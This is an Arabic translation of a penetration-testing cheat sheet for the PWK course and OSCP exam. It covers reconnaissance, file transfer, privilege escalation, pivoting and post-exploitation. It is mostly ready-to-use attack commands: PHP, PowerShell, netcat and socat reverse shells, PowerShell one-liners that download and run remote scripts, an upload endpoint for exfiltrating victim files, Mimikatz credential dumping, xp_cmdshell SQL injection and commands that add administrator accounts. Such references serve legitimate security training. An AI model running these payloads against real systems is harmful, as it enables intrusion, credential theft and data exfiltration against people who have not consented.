
ورقة غش شاملة لاختبار الاختراق لتحضير امتحان PWK/OSCP، تغطي تصعيد الامتيازات، كسر كلمات المرور، توليد الحمولات، ما بعد الاستغلال، فحص المنافذ، الهجمات على الويب، وتقنيات الاستطلاع.
JustTryHarder هو مرجع سريع سيساعدك خلال دورة PWK وامتحان OSCP.
(مستوحى من PayloadAllTheThings)
لا تتردد في تقديم Pull Request وترك نجمة لمشاركة الحب إذا ساعدك هذا. 💖
صديق لـ Hacktoberfest! نعم، نحن منفتحون لطلبات Pull Requests لـ Hacktoberfest! يرجى التأكد من أنها ليست بريدًا عشوائيًا وتساهم فعليًا بشكل جيد في هذا المستودع. شكرًا واستمتع بالاختراق!
إخلاء مسؤولية: لا شيء مما يلي يحتوي على حرق لمختبرات PWK / امتحان OSCP.
لقد حصلت على الكثير من هذه المعلومات من خلال مستودعات Github الأخرى والمدونات والمواقع والمزيد. لقد حاولت تقديم أكبر قدر من الإسناد إلى المنشئ الأصلي بقدر الإمكان. إذا لم أقدم لك الإسناد، فيرجى الاتصال بي على Twitter: https://twitter.com/s1nfulz
ping 10.10.10.110 PING 10.10.10.110 (10.10.10.110) 56(84) bytes of data. 64 bytes from 10.10.10.110: icmp_seq=1 ttl=128 time=166 ms
يمكن استخدام `TTL` لتحديد نظام تشغيل المضيف. الأنواع الثلاثة المختلفة من TTL موضحة أدناه:
- **TTL=64** = \*nix - عدد القفزات؛ لذا إذا كنت تحصل على 61، فهناك 3 قفزات وهو جهاز \*nix. على الأرجح Linux.
- **TTL=128** = Windows - مرة أخرى، إذا كان TTL هو 127 فإن القفزة هي 1 وهو جهاز Windows.
- **TTL=254** = Solaris/AIX - إذا كان TTL هو 250 فإن عدد القفزات هو 4 وهو جهاز Solaris.
## BOF (قيد التطوير)
(الأحرف السيئة النموذجية تشمل: `0x00`, `0x0A`, `0x0D`)
- Fuzzing
- إيجاد موضع EIP
- إيجاد الأحرف السيئة
- تحديد موقع `jmp esp`
- إنشاء الحمولة باستخدام `msfvenom`
- الحصول على شل عكسي باستخدام `netcat`
**موارد جيدة حول BOF:**
- [NCC Group - Writing Exploits for Win32](https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/writing-exploits-for-win32-systems-from-scratch/)
- [Corelan - Exploit Writing Tutorial Part 1](https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/)
- [GitHub - dostackbufferoverflowgood](https://github.com/justinsteven/dostackbufferoverflowgood)
- [VeteranSec - 32-bit Windows Buffer Overflows Made Easy](https://veteransec.com/2018/09/10/32-bit-windows-buffer-overflows-made-easy/)
## عمليات الهروب / الهروب من البيئات
- [Pentest Partners - Breaking out of Citrix](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/)
- [SRA.io - SiteKiosk Breakout](https://sra.io/blog/sitekiosk-breakout/)
- [TrustedSec - Kiosk/POS Breakout Keys](https://www.trustedsec.com/blog/kioskpos-breakout-keys-in-windows/)
- [Cognosec - Breaking out of Citrix Environment](https://cognosec.com/breaking-out-of-citrix-environment/)
- [NetSPI - Breaking out of Applications](https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/)
- [NCC Group - Common Issues with Environment Breakouts (PDF)](https://research.nccgroup.com/wp-content/uploads/2020/07/research-insights_common-issues-with-environment-breakouts.pdf)
- [GracefulSecurity - Citrix Breakout](https://gracefulsecurity.com/citrix-breakout/)
## DNS - نقل المناطق```bash
host -t axfr HTB.local 10.10.10.10
host -l HTB.local 10.10.10.10
host -l <domain name> <name server>
dig @<dns server> <domain> axfr
```
## نقل الملفات
### نقل SMB
على جهاز الضحية (Windows):```cmd
net share \\10.10.10.10\myshare
net use x:
copy whatever.zip x:
```
### Wget نقل
كيفية استرداد ملف (ملفات) من المضيف (داخل شل عكسية).
**الإعداد:** ضع الملف الذي تريد نقله في `/var/www/html/` وشغل `service apache2 start`.
شغل على الخادم البعيد:```bash
wget [http://10.10.10.10/pspy64](http://10.10.10.10/pspy64) # <- for single file
wget -r [http://10.10.10.10/pspy64/](http://10.10.10.10/pspy64/) # <- for folder
```
### نقل TFTP
(كيفية النقل من Kali إلى Windows).
**باستخدام MSF:**
قم بتشغيل MSF قبل هذه الخطوات:
1. `use auxiliary/server/tftp`
2. `set TFTPROOT /usr/share/mimikatz/Win32/`
3. `run`
**داخل الطرفية:**
4. `tftp -i 10.10.10.10 GET mimikatz.exe`
### NetCat (من Windows إلى Kali)
1. **Windows:** `nc -nv 10.11.0.61 4444 < bank-account.zip`
2. **Linux:** `nc -nlvp 4444 > bank-account.zip`
### PowerShell
جلسة تفاعلية:```powershell
Invoke-WebRequest -Uri [http://127.0.0.1/exploit.py](http://127.0.0.1/exploit.py) -OutFile C:\Users\Victim\exploit.py
```
بدون جلسة باورشيل تفاعلية (أنشئ `wget.ps1`):```powershell
$client = New-Object System.Net.WebClient
$path = "C:\path\to\save\file.txt"
$client.DownloadFile($url, $path)
```
### Base64 (لينكس -> لينكس)
**المضيف المحلي:**
1. `$(echo "cat /path/to/exploit.py | base64") > encoded.b64`
2. انقل `encoded.b64` إلى الخادم البعيد باستخدام `nc` أو بطريقة أخرى.
**الخادم البعيد - لينكس:**
3. `cat /path/to/encoded.b64 | base64 -d > exploit.py`
### Certutil```cmd
certutil.exe -urlcache -split -f "[http://ip.for.kali.box/file-to-get.zip](http://ip.for.kali.box/file-to-get.zip)" name-to-save-as.zip
```
### رفع الملفات عبر HTTP (تسريب)
**1. إنشاء upload.php**
إنشاء في جذر الويب للجهاز المهاجم (`/var/www/html` افتراضيًا).```php
<?php
$uploaddir = '/var/www/uploads/';
$uploadfile = $uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)
?>
```
**2. إنشاء الدليل**
أنشئ دليل الرفع واضبط الأذونات المناسبة للسماح بالرفع.```bash
sudo mkdir /var/www/uploads && sudo chown www-data:www-data /var/www/uploads
```
**3. رفع ملف**
رفع ملف من الجهاز الضحية إلى الجهاز المهاجم باستخدام PowerShell:```powershell
powershell.exe -exec unrestricted -noprofile -Command "(New-Object System.Net.WebClient).UploadFile('[http://10.10.10.10/upload.php](http://10.10.10.10/upload.php)', 'file-to-upload.txt')"
```
## Kerberoasting
- `GetUserSPNs.py -request -dc-ip <DC_IP> <domain\user>`
- `powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat`
- `impacket-secretsdump -just-dc-ntlm <DOMAIN>/<USER>@<DOMAIN_CONTROLLER> -outputfile filename.hashes`
## LFI / RFI
**PHP Reverse Shell:**```php
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10/1234 0>&1'"); ?>
```
**حقن الأوامر:**```php
<?php echo shell_exec(whoami);?>
```
## MSSQL / SQLi
- `EXEC master..xp_cmdshell 'whoami';`
- `' exec master..xp_cmdshell 'whoami' --`
- [OSCP-2 SQL Injection Cheatsheet](https://github.com/codingo/OSCP-2/blob/master/Documents/SQL%20Injection%20Cheatsheet.md)
- [PentestMonkey SQL Injection](http://pentestmonkey.net/category/cheat-sheet/sql-injection)
## تكسير كلمات المرور
**Hashcat**```bash
hashcat -m 500 -a 0 -o cracked_password.txt --force hash.txt /path/to/your/wordlist.txt
```
**John The Ripper**```bash
john --rules --wordlist=/path/to/your/wordlist.txt hash.txt
```
## رش كلمات المرور (CrackMapExec)```bash
cme smb 10.10.10.10 -u username -d domain -p password
```
## توليد الحمولات
- [NETSEC - إنشاء الحمولات](https://netsec.ws/?p=331)
- [ورقة الغش لـ MsfVenom](https://www.google.com/search?q=http://security-geek.in/2016/09/07/msfvenom-cheat-sheet/_)
- [Metasploit Unleashed - الحمولات](https://www.offensive-security.com/metasploit-unleashed/payloads/)
- [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)
**الأنواع:**
- غير المجزأة: `netcat`
- المجزأة: `multi/handler`
## PHP
- [الاختلافات بين exec() و shell\_exec و system() و passthru()](https://stackoverflow.com/questions/20072696/what-is-different-between-exec-shell-exec-system-and-passthru-functions?lq=1)
## تصعيد الصلاحيات - لينكس
**ملاحظة:** إذا تم تثبيت GCC و wget، فقد يكون النظام عرضة لاستغلال النواة.
- [استغلالات نواة لينكس](https://github.com/SecWiki/linux-kernel-exploits)
- [GTFObins - الهروب من الأصداف المقيدة](https://gtfobins.github.io)
- سكريبت مساعد GTFO: [https://github.com/dreadnaughtsec/gtfo](https://github.com/dreadnaughtsec/gtfo)
- [Linux Exploit Suggester](https://github.com/InteliSecureLabs/Linux_Exploit_Suggester)
- [Linux Exploit Suggester 2](https://github.com/jondonas/linux-exploit-suggester-2)
- [تصعيد الصلاحيات الأساسي في لينكس](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
**أوامر التعداد:**```bash
grep -Ri 'password' .
find / -perm –4000 2>/dev/null
find / -perm -u=s 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null
# (then ls -la, look for 777 file permissions)
```
**ثنائي SUID مخصص:**
يتطلب تنفيذ التعليمات البرمجية كمستخدم الهدف. مثال: mysql sys\_eval كـ root.```c
#include<stdio.h>
#include<unistd.h>
#include<sys/types.h>
int main(){
setuid(geteuid());
system("/bin/bash");
return 0;
}
```
## تصعيد الامتيازات - ويندوز
- [أساسيات تصعيد الامتيازات في ويندوز](http://www.fuzzysecurity.com/tutorials/16.html)
- [دليل تصعيد الامتيازات في ويندوز](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)
- [PowerUp / PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc)
- [Powerless - أداة تعداد](https://github.com/M4ximuss/Powerless)
- [ورشة عمل تصعيد الامتيازات المحلية](https://github.com/sagishahar/lpeworkshop)
- [مجرد نص تعداد آخر لـ ويندوز / JAWS](https://github.com/411Hall/JAWS)
- [Watson](https://github.com/rasta-mouse/Watson)
- [Sherlock (مهمل)](https://github.com/rasta-mouse/Sherlock)
- [مقترح ثغرات ويندوز](https://github.com/GDSSecurity/Windows-Exploit-Suggester)
**الأوامر:**
- `churrasco -d "net user /add <username> <password>"`
- `churrasco -d "net localgroup administrators <username> /add"`
- `churrasco -d "NET LOCALGROUP "Remote Desktop Users" <username> /ADD"`
## ما بعد الاستغلال
1. `Mimikatz.exe` (تشغيله)
2. `privilege::debug`
3. `sekurlsa::logonpasswords`
## إعادة توجيه المنافذ
> **محلي:** إعادة توجيه منفذ محلي إلى مضيف بعيد.
> استخدم المحلي إذا كان لديك خدمة قيد التشغيل على جهاز يمكن الوصول إليه من الجهاز البعيد، وتريد الوصول إليها مباشرة من الجهاز المحلي.
>
> **بعيد:** إعادة توجيه منفذ بعيد إلى مضيف محلي.
> استخدم البعيد إذا كان لديك خدمة يمكن الوصول إليها من الجهاز المحلي، وتحتاج إلى جعلها متاحة للجهاز البعيد. يفتح مقبس الاستماع على الجهاز الذي سجلت الدخول إليه عبر SSH.
>
> **ديناميكي:** استخدام SOCKS.
> الديناميكي يشبه المحلي، لكنه يعمل من جانب العميل كخادم وكيل SOCKS. استخدمه إذا كنت بحاجة إلى الاتصال ببرنامج يتوقع إعادة توجيه SOCKS.
### Chisel
**النظام المحلي:**```bash
./chisel server -p 8080 --reverse
```
**الضحية:**```bash
./chisel client YOUR_IP:8080 R:1234:127.0.0.1:1234
```
### SSH
1. **إنشاء زوج مفاتيح SSH** على الجهاز الذي يتم التنقل عبره لحماية بيانات الاعتماد الخاصة بك.
<!-- end list -->```bash
ssh-keygen
cat ~/.ssh/id_rsa.pub
```
2. **انسخ المفتاح العام**. أضف هذه القيمة وعنوان IP لجهاز الوسيط إلى ملف `~/.ssh/authorized_keys` على جهاز الهجوم (Kali) باستخدام الصيغة أدناه.
<!-- end list -->```
from="[VICTIM_MACHINE_IP_ADDRESS]",command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-X11-forwarding,no-pty [PUBLIC_KEY_VALUE]
```
3. **تأكد من تشغيل خدمة SSH** على جهازك المهاجم (Kali).
<!-- end list -->```bash
sudo service ssh start
```
4. **Initiate SSH call** من الصندوق الذي يتم من خلاله التوجيه (pivoting) وحدد المفتاح الخاص `id_rsa` الذي تم إنشاؤه في الخطوة 1.
<!-- end list -->```bash
ssh -f -N -R 1080 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i /[PATH_TO_YOUR_PRIVATE_KEY]/id_rsa kali@[ATTACKING_MACHINE_IP]
```
5. **تحرير إعدادات proxychains الخاصة بك**: `/etc/proxychains.conf`
<!-- end list -->```
socks4 127.0.0.1 1080
```
6. **تشغيل proxychains**. عند المسح باستخدام `nmap`، تأكد من استخدام فحوصات TCP Connect.
<!-- end list -->```bash
sudo proxychains nmap -sT -p80 -sC -sV --open -Pn -n 10.10.10.10
```
**ملاحظات إضافية:**
- `ssh [email protected] -R 1234:127.0.0.1:1234`
- `ssh -D 1337 -q -C -N -f [email protected]` ([المصدر](https://ma.ttias.be/socks-proxy-linux-ssh-bypass-content-filters))
## Socks Proxy (باستخدام PowerShell)
**محلي:**
- `vi /etc/proxychains.conf` -\> `socks5 <ip> 9080`
- `Import-Module .\Invoke-SocksProxy.psm1`
- `Invoke-SocksProxy -bindPort 9080`
- `proxychains nmap -sT <ip>`
## فحص المنافذ
### TCP```bash
reconnoitre -t 10.10.10.10 -o . --services --quick --hostnames
nmap -vvv -sC -sV -p- --min-rate 2000 10.10.10.10
nmap -sT -p 22,80,110 -A
nmap -p- -iL ips.txt > TCP_Ports.txt
nc -v -n -z -w1 10.10.10.10 1-10000
nmap -p- -iL ips.txt > AllTCPPorts.txt
```
### UDP
(يمكن أن يستغرق ساعات، `netstat` هو بديل أفضل إذا كان لديك shell).```bash
nmap -sU --top-ports 10000
nmap -sT -sU -p 22,80,110 -A
nmap -sT -sU -p- --min-rate 2000
nmap -p- -sU -iL ips.txt > udp.txt
nmap -sU -sV -iL ips.txt > alludpports.txt
```
### بروتوكولات أخرى
**SNMP:**
`nmap -p161 -sU -iL ips.txt > udp.txt`
**SSH:**
`nmap --script ssh2-enum-algos -iL ips.txt > SSH.txt`
**SSL:**
`nmap -v -v --script ssl-cert,ssl-enum-ciphers,ssl-heartbleed,ssl-poodle,sslv2 -iL ips.txt > SSLScan.txt`
**NMAP Bootstrap Report:**```bash
nmap -oA poison --stylesheet nmap-bootstrap.xsl 10.10.10.10
firefox nmap-bootstrap.xsl
```
## Ping Sweep
### Linux (أسطر مفردة)```bash
for i in {1..254} ;do (ping -c 1 192.168.1.$i | grep "bytes from" &) ;done
fping -g 192.168.0.1/24
```
### لينكس (سكريبت)```bash
for i in `seq 1 255`
do
ping -c1 192.168.125.$i 2>/dev/null 1>&2
if [[ $? -eq 0 ]]
then
echo 192.168.125.$i is up
fi
done
```
### ويندوز (CMD)```cmd
for /L %i in (1,1,255) do @ping -n 1 -w 200 192.168.1.%i > nul && echo 192.168.1.%i is up.
```
### Windows (PowerShell)```powershell
$ping = New-Object System.Net.Networkinformation.Ping ; 1..254 | % { $ping.send("10.9.15.$_", 1) | where status -ne 'TimedOut' | select Address | fl * }
```
### Nmap```bash
nmap -sP 192.168.0.1-254
```
## التنقل
- `sshuttle -r [email protected] 10.1.1.0/24`
## Remote Desktop
- `rdesktop -u user -p password 10.10.10.10 -g 85% -r disk:share=/root/`
- `xfreerdp /d:xyz.local /u:username /p:password /v:10.10.10.10 /cert-ignore`
## Responder
- `responder -I tun0 -wrF`
- [Responder مع ترحيل NTLM و Empire](https://chryzsh.gitbooks.io/darthsidious/content/execution/responder-with-ntlm-relay-and-empire.html)
- [دليل عملي لترحيل NTLM](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html)
## Reverse Shells
**Linux:**
- [PentestMonkey - ورقة غش الصدف العكسية](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
- [Awansec - صدفة عكسية](https://awansec.com/reverse-shell.html)
- [RevShells.com](https://www.revshells.com/)
**Windows:**
- [GitHub - Windows PHP Reverse Shell](https://github.com/Dhayalanb/windows-php-reverse-shell)
- `nc 10.10.10.10 4444 –e cmd.exe`
## Shell Upgrading
المصدر: [Ropnop Blog](https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/) و [HTB Forum](https://forum.hackthebox.eu/discussion/142/obtaining-a-fully-interactive-shell)
### Python
1. `python -c 'import pty;spawn("/bin/bash");'` OR `python3 -c 'import pty;spawn("/bin/bash");'`
2. في الصدفة العكسية:
<!-- end list -->```bash
python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
```
3. في كالي:
<!-- end list -->```bash
stty raw -echo
fg
```
4. في الصدفة العكسية:
<!-- end list -->```bash
reset # (sometimes optional)
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <cols> # (optional)
```
### استخدام Socat
**المستمع:**```bash
socat file:`tty`,raw,echo=0 tcp-listen:4444
```
**الضحية:**```bash
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
```
### Perl
1. `perl -e 'exec "/bin/sh";'`
2. `perl: exec "/bin/sh";`
### Bash
`/bin/sh -i`
## حقن SQL (SQLmap)```bash
sqlmap -u "[http://example.com/test.php?test=test](http://example.com/test.php?test=test)" --level=5 --risk=3 --batch
```
## عرض منافذ الاستماع
**Linux netstat:**
`netstat -tulpn | grep LISTEN`
**FreeBSD/MacOS X netstat:**
`netstat -anp tcp | grep LISTEN`
`netstat -anp udp | grep LISTEN`
**OpenBSD netstat:**
`netstat -na -f inet | grep LISTEN`
`netstat -nat | grep LISTEN`
**مسح Nmap:**
`sudo nmap -sT -O localhost`
`sudo nmap -sU -O 192.168.2.13` (UDP)
`sudo nmap -sT -O 192.168.2.13` (TCP)
## SMB - تعداد
- [0xdf - قائمة التحقق من تعداد SMB](https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html)
- `smbmap -H 10.10.10.10`
- `smbclient -L 10.0.0.10`
- `smbclient //10.10.10.10/share$`
## SMB - Impacket
**PSEXEC الخاصة بـ Impacket** (بعد إنشاء إعادة توجيه منفذ بعيد):```bash
/usr/share/doc/python-impacket/examples/psexec.py [email protected]
# Password: (password)
# [*] Trying protocol 445/SMB...
```
**Impacket's SMBServer** (لنقل الملفات):
1. `cd /usr/share/windows-binaries`
2. `python /usr/share/doc/python-impacket/examples/smbserver.py a .`
3. `\\10.10.10.10\a\mimikatz.exe`
## تعداد SMTP
- [أوامر SMTP](https://github.com/s0wr0b1ndef/OSCP-note/blob/master/ENUMERATION/SMTP/smtp_commands.txt)
## حقن ICMP
1. `ping -n 3 10.10.10.10`
2. `tcpdump -i tun0 icmp`
## VMware (عدم الدخول في وضع ملء الشاشة)
`systemctl restart open-vm-tools.service`
## خوادم الويب
- `python -m SimpleHTTPServer 80`
- `python3 -m http.server 80`
- `ngrok http "file:///C:\Users\sinfulz\Public Folder"`
- `php -S 0.0.0.0:80`
## مسح الويب
**GoBuster (لينكس/أباتشي):**```bash
gobuster dir -e -u [http://10.10.10.10/](http://10.10.10.10/) -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,jsp,pl -s 200,204,301,302,307,403,401
```
**GoBuster (Windows/IIS):**```bash
gobuster dir -e -u [http://10.10.10.10/](http://10.10.10.10/) -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,asp,aspx,jsp,bak -s 200,204,301,302,307,403,401
```
**Dirsearch (Linux/Apache):**```bash
python3 dirsearch.py -r -u [http://10.10.10.131/](http://10.10.10.131/) -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e php,html,js,txt,jsp,pl -t 50
```
**Dirsearch (Windows/IIS):**```bash
python3 dirsearch.py -r -u [http://10.10.10.131/](http://10.10.10.131/) -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e php,html,js,txt,asp,aspx,jsp,bak -t 50
```
**أوامر GoBuster أخرى:**
- HTTP: `gobuster dir -u http://10.10.10.10 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,html,txt -t 69`
- HTTPS: `gobuster dir -k -u https://10.10.10.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 69`
**Nikto:**
- HTTP: `nikto -h 10.10.10.10 -p 80`
- HTTPS: `nikto -h 10.10.10.10 -p 443`
**WFuzz:**```bash
wfuzz -u [http://10.10.10.10/hello.php?dir=../../../../../../../../../FUZZ%00](http://10.10.10.10/hello.php?dir=../../../../../../../../../FUZZ%00) -w /usr/share/wfuzz/wordlist/general/common.txt
```
## أغلفة الويب
- [PHPBash](https://github.com/Arrexel/phpbash)
- [p0wny-shell](https://github.com/flozz/p0wny-shell)
## ووردبريس
- [Top Hat Sec - WP](https://forum.top-hat-sec.com/index.php?topic=5758.0)
## إطار ويندوز / باورشيل
**تجاوز سياسة تنفيذ باورشيل:**```powershell
powershell -ExecutionPolicy ByPass -File script.ps1
```
**الموارد:**
- [Nishang](https://github.com/samratashok/nishang)
- [Sherlock](https://github.com/rasta-mouse/Sherlock)
**باورشيل العكسي:**
(في بعض الأحيان قد تحتاج إلى وضع powershell أو echo قبل السلسلة، أو استخدام علامات الاقتباس).```powershell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.1.3.40',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```
**PowerUp (من خادم الويب المحلي):**```powershell
echo IEX(New-Object Net.WebClient).DownloadString('[http://10.10.10.10:80/PowerUp.ps1](http://10.10.10.10:80/PowerUp.ps1)') | powershell -noprofile -
```
أو```powershell
powershell -nop -exec bypass IEX "(New-Object Net.WebClient).DownloadString('[http://10.10.14.](http://10.10.14.)x/Whatever.ps1'); Invoke-Whatever"
```
**باورشيل عكسي باستخدام MSSQL:**```sql
xp_cmdshell powershell IEX(New-Object Net.WebClient).downloadstring(\"[http://10.10.10.10/Nishang-ReverseShell.ps1](http://10.10.10.10/Nishang-ReverseShell.ps1)\")
```
**نقل الملفات باستخدام PowerShell:**```powershell
powershell -c IEX(New-Object Net.WebClient).DownloadFile('http://server/path/to/file', 'nameforefile')
```
## أوامر استغلال ما بعد الاختراق في Windows```cmd
WMIC USERACCOUNT LIST BRIEF
net user
net localgroup Users
net localgroup Administrators
net user USERNAME NEWPASS /add
net user "USER NAME" NEWPASS /add
net localgroup administrators USERNAME /add
```
## الأدلة القابلة للكتابة
### ويندوز
(المصدر: [UltimateAppLockerByPassList](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md))
المجلدات التالية قابلة للكتابة بشكل افتراضي من قبل المستخدمين العاديين (يختلف حسب إصدار نظام التشغيل).```
C:\Windows\Tasks
C:\Windows\Temp
C:\windows\tracing
C:\Windows\Registration\CRMLog
C:\Windows\System32\FxsTmp
C:\Windows\System32\com\dmp
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\SERVERS
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\System32\Tasks_Migrated
C:\Windows\SysWOW64\FxsTmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System
```
### لينكس
للعثور على المجلدات القابلة للكتابة عالميًا في لينكس:```bash
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print
```
## قائمة المهام:
- [ ] تحسين قابلية قراءة ورقة الغش
- [ ] ملء الأقسام الفارغة
- [ ] إزالة الأقسام غير الضرورية
- [ ] دمج الملفات الموجودة في المستودع في ورقة الغش
- [ ] الترحيل إلى GitBook
- [ ] تضمين لقطات شاشة/GIF في ورقة الغش إذا لزم الأمر
- [ ] إضافة جدول المحتويات
## شكرًا:
شكرًا لهؤلاء الأشخاص لتضمين ورقة الغش الخاصة بي على موقعهم/مدونتهم:
- [KhaoticDev Cheatsheets](https://khaoticdev.net/cheatsheets/#collections)
- [NCyberSec Facebook Post](https://www.facebook.com/ncybersec/posts/1541830509321001)
- [CyberG0100 Facebook Post](https://www.facebook.com/cyberg0100/posts/github-sinfulzjusttryharder-justtryharder-a-cheat-sheet-which-will-aid-you-throu/653235345249466)
- [r/CyberSpaceVN Reddit Post](https://www.reddit.com/r/CyberSpaceVN/comments/f3n2wp/github_sinfulzjusttryharder_justtryharder_a_cheat)
- [XN4K PWK Cheatsheet](https://xn4k.github.io/pentest/PWK-course-&-the-OSCP-Exam-Cheatsheet/)
- [OpenSourceLibs Pentesting Tools](https://opensourcelibs.com/libs/pentesting-tools)
- [GitMemory (brhannah)](https://gitmemory.com/brhannah)
- [BugBountyTips Blog](https://www.bugbountytips.tech/2020/08/23/justtryharderpwk-cheatsheetkali-linux-cheatsheethydra-cheatsheetsecu-2/)
- [PythonLang OSCP Category](https://pythonlang.dev/category/oscp/)